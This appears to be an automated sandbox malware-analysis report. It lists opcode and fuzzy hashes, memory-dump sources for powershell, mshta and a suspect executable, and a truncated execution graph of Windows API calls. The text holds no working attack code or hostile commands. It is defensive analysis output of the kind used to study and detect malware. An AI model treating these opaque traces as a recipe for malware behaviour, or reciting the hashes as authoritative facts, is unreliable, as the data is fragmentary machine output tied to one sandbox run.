                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                                                • String ID: csm
                                                                                                                                                                                                                                                • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                                                • Opcode ID: 4f0f6445cfedea8dceb7eb9436a550d57130d2c9509dbddfada5299d94659d4a
                                                                                                                                                                                                                                                • Instruction ID: 999e80c2de1e550b40157e95cc51e93f567e9002ce35832dfb1a1cba2b8f026e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4f0f6445cfedea8dceb7eb9436a550d57130d2c9509dbddfada5299d94659d4a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 92112B32618B8183EB619F15F440269B7E4FB88F94F994234DE8D07B69EF3CD5528B00
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID: :
                                                                                                                                                                                                                                                • API String ID: 2595371189-336475711
                                                                                                                                                                                                                                                • Opcode ID: 12447209ac998d916ea5af24bee96286b8310982615a7f3bb8f9e7bff02e83a7
                                                                                                                                                                                                                                                • Instruction ID: ba3a1ff7511b0b4414d425eb6ff46139613af58c264950ad48d73016b97ccb97
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 12447209ac998d916ea5af24bee96286b8310982615a7f3bb8f9e7bff02e83a7
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1701882291C20787F721BF50B4A627EA7A0EFD4B64FC00035D55D46695DF2CD5068E34
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2310099043.00007FFD32430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD32430000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_7ffd32430000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: SS_H
                                                                                                                                                                                                                                                • API String ID: 0-3542247296
                                                                                                                                                                                                                                                • Opcode ID: 09e3544c4e688e313a493238ddf6318a2d699d85fc8c792385510c0989b97efa
                                                                                                                                                                                                                                                • Instruction ID: 90185696e68ed56cd9d67a4ffcfa3a650f6bb0a83b821f955dd4f214c66b123f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 09e3544c4e688e313a493238ddf6318a2d699d85fc8c792385510c0989b97efa
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B6B16D71F0CA894FE756DB2CC8656F57BE0EF62321B0841BED289C7193DA65B812C741
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2314826374.00007FFD32500000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD32500000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_7ffd32500000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 2e2a87484646cf0a4bea0cc933a23ac221a328035287cafbeb90ebfbb23247c3
                                                                                                                                                                                                                                                • Instruction ID: a8c85f74e6151a1263b9d99e5dfbcc2659bbe3215a6b5a3aa54db1432c857f5a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2e2a87484646cf0a4bea0cc933a23ac221a328035287cafbeb90ebfbb23247c3
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DBD16432E0EACA4FEBAAAF6848745B97BE0EF45311B1841BFD14DCB0D7D958A905C341
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2310099043.00007FFD32430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD32430000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_7ffd32430000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 203f0c506975134a246f9853447ceb452d8a51024001ab3c00718c56bf4435db
                                                                                                                                                                                                                                                • Instruction ID: 939a6006c3258be46f7fc4ffe1ef2ef27e0ba39a78a78c7a6b365bd8ae8b0458
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 203f0c506975134a246f9853447ceb452d8a51024001ab3c00718c56bf4435db
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B341E376A4D7D94FD3039BA8ACB51D47FB0EF2222570D01F7C688CB193E948185A8792
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2310099043.00007FFD32430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD32430000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_7ffd32430000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: e07b4f0fa22054868f85888095ac67f31241bc4bd5f86cf204523bee55603b12
                                                                                                                                                                                                                                                • Instruction ID: 396211fe8cb4df9df5df76a0d317ee687a5c744a96ad7f7063f0c062985ac0e9
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e07b4f0fa22054868f85888095ac67f31241bc4bd5f86cf204523bee55603b12
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 56F02734908ACC8FCB45DF2888296E53FF0FF25311F05019BE90CCB122D6609A68CBC2
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2310099043.00007FFD32430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD32430000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_7ffd32430000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 430730c108bf12d203b88bf3e59fb2f1e7017e956508e56a28f28cc546e4a7af
                                                                                                                                                                                                                                                • Instruction ID: 3e6bcc0e3720888a3f63a960bc977fea4540d9e585abdb7ff449b09ce8f67825
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 430730c108bf12d203b88bf3e59fb2f1e7017e956508e56a28f28cc546e4a7af
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9A513A32E0CB884FD7199B2C98655E9BFE0EF55311F04027FD198D3193DA64B916C792
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2310099043.00007FFD32430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD32430000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_7ffd32430000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                                                                                                                                                • Instruction ID: a5afd92068d187e9aa175b2cbf18bc0b8fde32836c7094354f3d6655c8f8a7be
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7D01677121CB0C4FD744EF0CE451AA5B7E0FB95364F10056DE58AC3665DA36E892CB45
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2314826374.00007FFD32500000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD32500000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_7ffd32500000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 62e573bcf852be9fd556ffb6a5badc512741bc1e8067ce31c55283abe3362577
                                                                                                                                                                                                                                                • Instruction ID: a0905d2450d90a780223f80743988047e1532d9661acee7af308f7398b355fec
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 62e573bcf852be9fd556ffb6a5badc512741bc1e8067ce31c55283abe3362577
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C9F09A32B0C6198FD769EB4CA8518E873E0EF48322B1140BAE15DC71A7CA26EC80C741
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2302284686.00007FFD3231D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3231D000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_7ffd3231d000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: d56f4bddb564cff3ae0eaed41149a3ffe2d2b29172fa5166b543b54159a42f63
                                                                                                                                                                                                                                                • Instruction ID: cc374bc5f12585db6f491fc36f7f5197fcb69c2e6b1c19856b0508ba406cc8e1
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d56f4bddb564cff3ae0eaed41149a3ffe2d2b29172fa5166b543b54159a42f63
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7CF0B730A19E099F8AA4FF2DC485E1237E1FB983107110699E45EC7265D674F892CB90
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2314826374.00007FFD32500000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD32500000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_7ffd32500000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: b3dbb6f14ec7668c8865d2f6a82b1f764d0daf3d20d8c1b6200733748134977e
                                                                                                                                                                                                                                                • Instruction ID: 79bf774f9902994c0ed3362d3a3e207a1e5e2908f885e54b6ca4b79e617e5c07
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b3dbb6f14ec7668c8865d2f6a82b1f764d0daf3d20d8c1b6200733748134977e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 95F08232B0D5588FDB69EF8CE4618A877E0EF05322B1940F6E15DC75A7DA26EC40C740
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2310099043.00007FFD32430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD32430000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_7ffd32430000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: N_^$N_^$N_^$N_^$N_^
                                                                                                                                                                                                                                                • API String ID: 0-2528851458
                                                                                                                                                                                                                                                • Opcode ID: edc0f0332c0a4c9c4809b1521de1fedd39ceafb9b70ffa2b826d80cc95a2d80e
                                                                                                                                                                                                                                                • Instruction ID: 50f7372a23229a18c4bdd572cb1f38a1d2a8b69aef2ad2d4d430d2e67c2118e3
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: edc0f0332c0a4c9c4809b1521de1fedd39ceafb9b70ffa2b826d80cc95a2d80e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 993182A3F4E6C25FE3470A381C7A1956FA0AE7322930A05F7D2D447193E9989517A712
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2310099043.00007FFD32430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD32430000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_7ffd32430000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: N_^$N_^$N_^$N_^
                                                                                                                                                                                                                                                • API String ID: 0-3900292545
                                                                                                                                                                                                                                                • Opcode ID: 6cbfd1f429746320f776e946eaa5b5f28f899a3a198cf9823f69531337fc78bf
                                                                                                                                                                                                                                                • Instruction ID: a52185f9f057a6390841492bea3d73f8547745a41956d81968c42a91ad5fc1f2
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6cbfd1f429746320f776e946eaa5b5f28f899a3a198cf9823f69531337fc78bf
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E72182A3F4E6D95FE35317286CB51A57F90AF3221970B05F3C7D48B093EE98150B9602
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000D.00000003.2237057383.000001DAE0CF0000.00000010.00000800.00020000.00000000.sdmp, Offset: 000001DAE0CF0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_3_1dae0cf0000_mshta.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                                                                                                                                                • Instruction ID: 6b94b894d1473b98992fae58ca04c7a3cdce75f1bc8d78c9adf7e3c9135d397e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 649002144D641655D42451E10C4539C518067C8654FE44481441690184D44D0296A157
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000041.00000002.2514457888.00007FFD32510000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD32510000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_65_2_7ffd32510000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 909b04333549f87ccd7b6145c84a4fb4ed14ee794aed78d41a0261d60059fe7f
                                                                                                                                                                                                                                                • Instruction ID: 7d27eabd24b6d00e137d91fa070e75e7804aacca4d0866b128f4da1c4ab007ed
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 909b04333549f87ccd7b6145c84a4fb4ed14ee794aed78d41a0261d60059fe7f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3E223622F0DB890FEBA79B2858661B57BE1EF86621B0841FFD08DC71D3D958AD05C352
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000041.00000002.2513470596.00007FFD32440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD32440000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_65_2_7ffd32440000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 7227f891e7a88c6223b1cc47f8c0f4f303f64cf7dafa5d8de71ecf3781b340dc
                                                                                                                                                                                                                                                • Instruction ID: d5bfa29d6f5c4cf027176388519d602fceb2792bd9915b7ef713245ef2d35b13
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7227f891e7a88c6223b1cc47f8c0f4f303f64cf7dafa5d8de71ecf3781b340dc
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C161D471E09A4C8FEB55DB6CD8952ADBBF1EF5A321F1441BED049D7292CA35AC02CB40
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000041.00000002.2514457888.00007FFD32510000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD32510000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_65_2_7ffd32510000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: c60f662be82a175446699a46e68793c6fd1ad92d4e24a891b189b7f57a59a96d
                                                                                                                                                                                                                                                • Instruction ID: f80333e6e24b76f7ec75f58242359729843cc38a7891d3e884b354634aa5e6e1
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c60f662be82a175446699a46e68793c6fd1ad92d4e24a891b189b7f57a59a96d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 17411622F0DB8A0FEB575A2844A22753BE1EF85622F4980FAC18CC7193DD69BD05D341
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000041.00000002.2513470596.00007FFD32440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD32440000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_65_2_7ffd32440000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                                                                                                                                                                • Instruction ID: ecf9f99ad612b16494824efce393f4b3b0a94e2b8a50ff6ea57562968c3e47c6
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4C01677121CB0C4FD744EF0CE451AA5B7E0FB95364F50056DE58AC3665D636E882CB45
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000041.00000002.2513470596.00007FFD32440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD32440000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_65_2_7ffd32440000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: (fl2$8fl2$Hfl2$Xfl2
                                                                                                                                                                                                                                                • API String ID: 0-2722109906
                                                                                                                                                                                                                                                • Opcode ID: 7b361d8553f9c6dd6034931411c39caf0d85189f749d399f3826f8c6901e9fdd
                                                                                                                                                                                                                                                • Instruction ID: b2e9c0ef39808269ffffa8e69f3a9cb40fee9a32d126a9ce92ad1a6bf8cd185e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7b361d8553f9c6dd6034931411c39caf0d85189f749d399f3826f8c6901e9fdd
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5BF0B483F0F8C507EB511B1C3E580796B51EFA122262643FBD0C44218F4C86AC0A8245

                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                Execution Coverage:7.9%
                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                Signature Coverage:0.5%
                                                                                                                                                                                                                                                Total number of Nodes:1216
                                                                                                                                                                                                                                                Total number of Limit Nodes:38
                                                                                                                                                                                                                                                execution_graph 38259 7ff60e5c3e71 38260 7ff60e5c3e81 38259->38260 38262 7ff60e5c3e89 38259->38262 38270 7ff60e619a14 49 API calls 38260->38270 38263 7ff60e5c3edd 38262->38263 38264 7ff60e5c3ea3 38262->38264 38273 7ff60e61a610 38263->38273 38271 7ff60e5e331c 48 API calls 2 library calls 38264->38271 38267 7ff60e5c3eab 38267->38263 38272 7ff60e5c63e8 8 API calls 2 library calls 38267->38272 38270->38262 38271->38267 38272->38263 38274 7ff60e61a61a 38273->38274 38275 7ff60e5c3eef 38274->38275 38276 7ff60e61a6a0 IsProcessorFeaturePresent 38274->38276 38277 7ff60e61a6b7 38276->38277 38282 7ff60e61a894 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 38277->38282 38279 7ff60e61a6ca 38283 7ff60e61a66c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 38279->38283 38282->38279 38284 7ff60e5c1884 38416 7ff60e5f34e4 38284->38416 38287 7ff60e5f34e4 CompareStringW 38289 7ff60e5c18a6 38287->38289 38288 7ff60e5c1926 38290 7ff60e5c195b 38288->38290 38480 7ff60e5f3f98 63 API calls 2 library calls 38288->38480 38292 7ff60e5f34e4 CompareStringW 38289->38292 38298 7ff60e5c18b9 38289->38298 38296 7ff60e5c1970 38290->38296 38481 7ff60e5e2ed8 100 API calls 3 library calls 38290->38481 38292->38298 38295 7ff60e5c1915 38479 7ff60e5dca40 61 API calls _CxxThrowException 38295->38479 38299 7ff60e5c19b8 38296->38299 38482 7ff60e6049f4 48 API calls 38296->38482 38298->38288 38478 7ff60e5c1168 8 API calls 2 library calls 38298->38478 38420 7ff60e5c5450 38299->38420 38301 7ff60e5c19b0 38483 7ff60e5d8444 54 API calls fflush 38301->38483 38307 7ff60e5c72c4 76 API calls 38314 7ff60e5c1a12 38307->38314 38308 7ff60e5c1b04 38458 7ff60e5d6c94 38308->38458 38309 7ff60e5c1ae6 38454 7ff60e5c7514 38309->38454 38312 7ff60e5c1af2 38313 7ff60e5c7514 72 API calls 38312->38313 38315 7ff60e5c1aff 38313->38315 38314->38308 38314->38309 38316 7ff60e61a610 _handle_error 8 API calls 38315->38316 38317 7ff60e5c2f97 38316->38317 38318 7ff60e5c1b13 38474 7ff60e5c7148 38318->38474 38320 7ff60e5c1c71 38321 7ff60e5c1ca7 38320->38321 38322 7ff60e5c63e8 8 API calls 38320->38322 38323 7ff60e5c1cd5 38321->38323 38324 7ff60e5c1ce4 38321->38324 38325 7ff60e5c1c91 38322->38325 38328 7ff60e61a444 new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 38323->38328 38326 7ff60e61a444 new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 38324->38326 38327 7ff60e5c49b8 99 API calls 38325->38327 38332 7ff60e5c1cee 38326->38332 38329 7ff60e5c1c9d 38327->38329 38328->38332 38330 7ff60e5c63e8 8 API calls 38329->38330 38330->38321 38331 7ff60e5c1d50 38334 7ff60e61a444 new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 38331->38334 38332->38331 38333 7ff60e60de30 72 API calls 38332->38333 38333->38331 38335 7ff60e5c1d62 38334->38335 38336 7ff60e60dbd0 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 38335->38336 38337 7ff60e5c1d7b 38335->38337 38336->38337 38338 7ff60e612bcc 66 API calls 38337->38338 38339 7ff60e5c1dba 38338->38339 38412 7ff60e5eae10 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 38339->38412 38340 7ff60e5c1e1c 38342 7ff60e5c10c0 8 API calls 38340->38342 38344 7ff60e5c1e5d 38340->38344 38341 7ff60e5c1dde std::bad_alloc::bad_alloc 38341->38340 38343 7ff60e61ba34 _CxxThrowException RtlPcToFileHeader RaiseException 38341->38343 38342->38344 38343->38340 38345 7ff60e5ca410 159 API calls 38344->38345 38410 7ff60e5c1ef4 38344->38410 38345->38410 38346 7ff60e5c2ccc 38347 7ff60e5c2d0c 38346->38347 38411 7ff60e5e8c80 72 API calls 38346->38411 38348 7ff60e60de30 72 API calls 38347->38348 38357 7ff60e5c2d21 38347->38357 38348->38357 38349 7ff60e5c2d86 38355 7ff60e6049f4 48 API calls 38349->38355 38391 7ff60e5c2dd0 38349->38391 38350 7ff60e6049f4 48 API calls 38408 7ff60e5c2005 38350->38408 38351 7ff60e5e6688 48 API calls 38351->38410 38352 7ff60e60b6d0 73 API calls 38352->38408 38353 7ff60e5c5e70 169 API calls 38353->38408 38354 7ff60e5ca504 208 API calls 38354->38391 38358 7ff60e5c2d9e 38355->38358 38356 7ff60e5c80e4 192 API calls 38356->38391 38357->38349 38359 7ff60e6049f4 48 API calls 38357->38359 38362 7ff60e5d8444 54 API calls 38358->38362 38364 7ff60e5c2d6c 38359->38364 38360 7ff60e5c5928 237 API calls 38360->38408 38361 7ff60e5ce6c8 157 API calls 38361->38410 38365 7ff60e5c2da6 38362->38365 38363 7ff60e5e7c7c 127 API calls 38363->38391 38366 7ff60e6049f4 48 API calls 38364->38366 38373 7ff60e5e1c24 12 API calls 38365->38373 38370 7ff60e5c2d79 38366->38370 38367 7ff60e5de21c 63 API calls 38367->38408 38368 7ff60e5c1168 8 API calls 38368->38391 38369 7ff60e5cb540 147 API calls 38369->38410 38371 7ff60e5d8444 54 API calls 38370->38371 38371->38349 38372 7ff60e5e65b4 48 API calls 38372->38410 38373->38391 38374 7ff60e5ca4d0 12 API calls 38374->38410 38375 7ff60e5e4554 16 API calls 38375->38410 38376 7ff60e5e1998 138 API calls 38376->38410 38377 7ff60e60ae50 71 API calls 38380 7ff60e5c2e39 38377->38380 38378 7ff60e5c33b4 64 API calls 38378->38391 38379 7ff60e5c5db4 46 API calls 38379->38410 38380->38377 38381 7ff60e5dca40 61 API calls 38380->38381 38380->38391 38381->38391 38382 7ff60e5c6188 231 API calls 38382->38391 38383 7ff60e5e1e80 15 API calls 38383->38410 38384 7ff60e5e7c7c 127 API calls 38384->38410 38385 7ff60e5e1930 11 API calls 38385->38410 38386 7ff60e5c3f74 138 API calls 38386->38391 38387 7ff60e5cb540 147 API calls 38387->38408 38388 7ff60e5dcbd0 75 API calls 38388->38410 38389 7ff60e6049f4 48 API calls 38389->38391 38390 7ff60e5fba9c 195 API calls 38390->38391 38391->38354 38391->38356 38391->38363 38391->38368 38391->38378 38391->38380 38391->38382 38391->38386 38391->38389 38391->38390 38393 7ff60e5d8444 54 API calls 38391->38393 38392 7ff60e5c5004 49 API calls 38392->38410 38393->38391 38394 7ff60e5e18ac 15 API calls 38394->38410 38395 7ff60e5c1168 8 API calls 38395->38410 38396 7ff60e60d48c 58 API calls 38396->38410 38397 7ff60e5ca410 159 API calls 38397->38410 38398 7ff60e5c571c 12 API calls 38398->38410 38399 7ff60e5c5e70 169 API calls 38399->38410 38400 7ff60e5d9be0 14 API calls 38400->38410 38401 7ff60e60c0a8 10 API calls 38401->38410 38402 7ff60e5e6378 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 38402->38410 38403 7ff60e5f97f0 GetStdHandle ReadFile GetLastError GetLastError GetFileType 38403->38410 38404 7ff60e5e5c0c 237 API calls 38404->38410 38405 7ff60e5e5d40 237 API calls 38405->38410 38406 7ff60e5c6114 216 API calls 38406->38410 38407 